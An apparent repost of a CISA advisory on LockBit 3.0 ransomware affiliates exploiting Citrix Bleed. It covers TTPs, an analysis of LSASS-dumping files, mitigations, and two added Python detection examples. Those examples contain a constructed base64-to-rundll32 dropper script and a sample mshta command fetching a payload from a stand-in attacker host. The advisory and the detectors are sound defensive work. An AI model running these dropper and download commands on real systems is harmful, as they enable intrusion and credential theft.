These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Historically, LockBit 3.0 affiliates have conducted attacks against organizations of varying sizes across multiple critical infrastructure sectors, including education, energy, financial services, food and agriculture, government and emergency services, healthcare, manufacturing, and transportation. The TTPs observed in LockBit ransomware attacks can vary significantly from one intrusion to another.

Citrix Bleed, known to be leveraged by LockBit 3.0 affiliates, allows threat actors to bypass password requirements and multifactor authentication, leading to successful hijacking of legitimate user sessions on Citrix NetScaler web application delivery control (ADC) and Gateway appliances. Due to the ease of exploitation, CISA and the authoring organizations expect widespread exploitation of the Citrix vulnerability in unpatched software services throughout both private and public networks.

Malware identified in this campaign is generated by the execution of a PowerShell script that concatenates two base64 strings, converts them to bytes, and writes them to the designated file path. The resulting file is then executed by the PowerShell script using rundll32. Although the file and domain have the appearance of legitimacy, they have no association with legitimate Adobe software and no identified interaction with that software. LockBit 3.0 affiliates have been observed using AnyDesk and Splashtop remote monitoring and management (RMM) tools, batch and PowerShell scripts, and the execution of HTA files using the Windows native utility mshta. The configuration file from the image could be leveraged to find the ID and connection IP, but that file was not available at the time of analysis. A Russian-geolocated IP address was used by the user to request mshta with HTTP arguments to download a randomly named HTA file, q0X5wzzEh6P7.
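The dropper pattern described above (two base64 literals concatenated, decoded to bytes, written to disk and run through rundll32) is easy to recognise in PowerShell Script Block Logging (Event ID 4104) once logging is enabled. The following is an added example, not code from the advisory: it builds a constructed script block of that shape, then scores it on the four indicators the advisory names. The "payload" is a stub that merely starts with the PE "MZ" magic, and the dropped path and export name are placeholders, not indicators from the advisory.

```python
import base64
import binascii
import re

# Constructed sample in the shape the advisory describes. The stub below only
# carries the PE "MZ" magic so the decoder has something to recognise; it is
# not malware. Path and export name are placeholders, not advisory IOCs.
_STUB = b"MZ" + bytes(range(60))
_B64 = base64.b64encode(_STUB).decode()
_CUT = (len(_B64) // 2) // 4 * 4          # split on a 4-char base64 boundary
_PART1, _PART2 = _B64[:_CUT], _B64[_CUT:]

SAMPLE_SCRIPT_BLOCK = (
    '$a = "' + _PART1 + '"\n'
    '$b = "' + _PART2 + '"\n'
    '$bytes = [System.Convert]::FromBase64String($a + $b)\n'
    r'[System.IO.File]::WriteAllBytes("C:\Users\Public\example_dropped.dll", $bytes)'
    '\n'
    r'rundll32.exe C:\Users\Public\example_dropped.dll,Start'
)

# Constructed benign block, used to show the scorer does not fire on ordinary admin work.
BENIGN_SCRIPT_BLOCK = r'Get-ChildItem C:\Temp -Recurse | Where-Object { $_.Length -gt 1MB }'

# Long runs of base64 alphabet inside double quotes; 40+ chars skips short tokens.
_B64_LITERAL = re.compile(r'"([A-Za-z0-9+/]{40,}={0,2})"')
# FromBase64String applied to the sum of two variables, the concatenation step.
_CONCAT_DECODE = re.compile(r'FromBase64String\s*\(\s*\$\w+\s*\+\s*\$\w+\s*\)', re.I)
_RUNDLL32 = re.compile(r'\brundll32(?:\.exe)?\b', re.I)


def analyze_script_block(text: str) -> dict:
    """Return the dropper indicators found in one script block, plus a score."""
    literals = _B64_LITERAL.findall(text)
    try:
        # Decode the literals in the order they appear, as the script itself would.
        decoded = base64.b64decode("".join(literals), validate=True)
    except binascii.Error:
        decoded = b""
    findings = {
        "concatenates_base64": bool(_CONCAT_DECODE.search(text)),
        "writes_bytes_to_disk": "WriteAllBytes" in text,
        "invokes_rundll32": bool(_RUNDLL32.search(text)),
        "decoded_is_pe": decoded.startswith(b"MZ"),
    }
    findings["score"] = sum(findings.values())
    findings["suspicious"] = findings["score"] >= 3
    return findings


if __name__ == "__main__":
    for label, block in (("sample", SAMPLE_SCRIPT_BLOCK), ("benign", BENIGN_SCRIPT_BLOCK)):
        print(label, analyze_script_block(block))
```

The decode step matters: concatenating the literals in script order and checking for an "MZ" header confirms that the script carries an executable, which separates this pattern from the many legitimate scripts that merely embed a base64 string. In production the input would be the ScriptBlockText field of each 4104 event rather than the constructed block here.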
Below are CISA-developed YARA rules and an open-source rule that may be used to detect malicious activity in the Citrix NetScaler ADC and Gateway software environment.

CISA received four files for analysis that show files being used to save registry hives, dump the Local Security Authority Subsystem Service (LSASS) process memory to disk, and attempt to establish sessions via Windows Remote Management (WinRM).

The first file, a.bat, is a Windows batch file used to execute the file a.exe with the file a.dll as an argument. The output is written to a file named z.txt in the path C:\Windows\Tasks. Next, a.bat runs three makecab commands to create three cabinet files from the previously saved registry hives and one file named C:\Users\Public\a.

The second file, a.exe, is a 64-bit Windows command-line executable that is executed by a.bat. It issues the remote procedure call ncalrpc:[lsasspirpc] to the RPC endpoint to obtain a file path to LSASS on the infected machine. Once the file path is returned, the malware loads the accompanying DLL, a.dll, into the running LSASS process.

The third file, a.dll, is a 64-bit Windows DLL that a.bat passes to a.exe as a parameter. a.exe loads this file into the running LSASS process on the infected machine. a.dll calls the Windows API CreateFileW to create a file called a.png in the path C:\Users\Public. Once this is complete, a.bat specifies that a.png is used to create the cabinet file a.cab in the path C:\Windows\Tasks.

The fourth file, a.py, is a Python script that attempts to leverage WinRM to establish a session.

MITIGATIONS

These mitigations apply to all critical infrastructure organizations and network defenders using Citrix NetScaler ADC and Gateway software.
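The file analysis above names concrete staging locations (C:\Windows\Tasks for z.txt and the .cab files, C:\Users\Public for a and a.png) and the native binaries involved (makecab, rundll32, mshta). Those are good hunting keys in process-creation telemetry. The following is an added example, not code from the advisory: a small set of rules run over constructed process-creation records in the shape of Sysmon Event ID 1 / Security 4688 fields. The hostname, DLL name and parent-process paths in the sample events are placeholders chosen for the example, not indicators from the advisory.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """Minimal process-creation record (fields common to Sysmon EID 1 and Security 4688)."""
    image: str
    parent: str
    cmdline: str


# Constructed sample events modelled on the advisory's file analysis. The
# hostname and the dropped DLL name are placeholders, not advisory IOCs.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\mshta.exe", r"C:\Windows\System32\cmd.exe",
              r"mshta.exe http://attacker-host.invalid/q0X5wzzEh6P7"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\cmd.exe",
              r"cmd.exe /c a.exe a.dll > C:\Windows\Tasks\z.txt"),
    ProcEvent(r"C:\Windows\System32\makecab.exe", r"C:\Windows\System32\cmd.exe",
              r"makecab C:\Users\Public\a.png C:\Windows\Tasks\a.cab"),
    ProcEvent(r"C:\Windows\System32\rundll32.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"rundll32.exe C:\Users\Public\example_dropped.dll,Start"),
    # Benign look-alikes: a packaging script and a locally installed HTA.
    ProcEvent(r"C:\Windows\System32\makecab.exe", r"C:\Windows\System32\cmd.exe",
              r"makecab /F C:\Build\driver.ddf"),
    ProcEvent(r"C:\Windows\System32\mshta.exe", r"C:\Windows\explorer.exe",
              r'mshta.exe "C:\Program Files\Vendor\help.hta"'),
]

# Staging directories named in the advisory's analysis.
_STAGING = re.compile(r"c:\\(?:windows\\tasks|users\\public)\\", re.I)
# Command output redirected into C:\Windows\Tasks (the z.txt behaviour of a.bat).
_REDIRECT_TASKS = re.compile(r">\s*\"?c:\\windows\\tasks\\", re.I)
_REMOTE_URL = re.compile(r"https?://", re.I)


def _image_is(e: ProcEvent, name: str) -> bool:
    return e.image.lower().endswith("\\" + name)


RULES = {
    # mshta fetching an HTA over HTTP rather than opening a local file
    "mshta_remote_hta": lambda e: _image_is(e, "mshta.exe") and bool(_REMOTE_URL.search(e.cmdline)),
    # makecab packing files from the staging directories
    "makecab_from_staging": lambda e: _image_is(e, "makecab.exe") and bool(_STAGING.search(e.cmdline)),
    # rundll32 loading a DLL from a world-writable staging path
    "rundll32_from_staging": lambda e: _image_is(e, "rundll32.exe") and bool(_STAGING.search(e.cmdline)),
    # any command whose output is redirected into C:\Windows\Tasks
    "output_redirected_to_tasks": lambda e: bool(_REDIRECT_TASKS.search(e.cmdline)),
}


def hunt(events):
    """Return (rule, image) pairs for every rule that fires on every event."""
    return [(rule, e.image) for e in events for rule, pred in RULES.items() if pred(e)]


if __name__ == "__main__":
    for rule, image in hunt(SAMPLE_EVENTS):
        print(f"{rule:28s} {image}")
```

The two benign records show why the rules key on the staging directories and on remote URLs rather than on the binary names alone: makecab and mshta are legitimate Windows components, so matching them unconditionally would bury the real hits. The LSASS memory dump itself is better caught by process-access telemetry (for example Sysmon Event ID 10 on lsass.exe), which these command-line rules do not cover.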
The authoring organizations of this CSA recommend that organizations implement the mitigations below to improve their cybersecurity posture in light of the observed threat actor activity and to reduce the risk of compromise associated with Citrix CVE-2023-4966 and LockBit 3.0 ransomware and its affiliates. Application allowlisting is important because antivirus solutions may fail to detect the execution of malicious portable executables when the files use any combination of compression, encryption, or obfuscation. Organizations should patch vulnerable software and hardware systems within 24 to 48 hours of vulnerability disclosure.

RESOURCES

REPORTING

The FBI is seeking any information that can be shared, including boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with LockBit 3.0 affiliates, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. The FBI and CISA do not encourage paying a ransom, as payment does not guarantee that victim files will be recovered. Regardless of whether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly report ransomware incidents to the FBI Internet Crime Complaint Center at ic3.
This Cyber News was published on www.cisa.gov. Publication date: Thu, 30 Nov 2023 21:55:14 +0000